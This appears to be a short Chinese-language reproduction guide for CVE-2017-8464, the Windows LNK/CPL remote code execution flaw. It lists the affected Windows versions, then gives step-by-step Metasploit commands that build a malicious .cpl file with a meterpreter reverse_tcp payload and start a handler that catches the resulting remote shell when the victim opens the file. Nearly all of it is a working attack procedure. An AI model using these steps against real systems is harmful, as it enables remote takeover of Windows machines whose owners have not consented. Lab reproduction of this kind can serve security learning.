影响版本
windows 10
windwos RT 8.1
windows 8.1
windows 7
windows server 2016
windows server 2012 R2
windows server 2012
windows server 2008 R2
windows server 2008
复现
需下载工具https://github.com/rapid7/metasploit-framework/archive/master.zip进行配置;
msfconsole
搜索攻击模块search cve_2017_8464没有就下载工具进行配置参考连接https://www.jianshu.com/p/40763fa14424
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.31.117
exploit
会在/.msf4/local生成文件将FlashPlayerCPLApp.cpl文件复制到靶机
use exploit/multi/handler
set paylaod windows/meterpreter/reverse_tcp
set lhost 192.168.31.117
exploit
双击虚拟机中的文件;
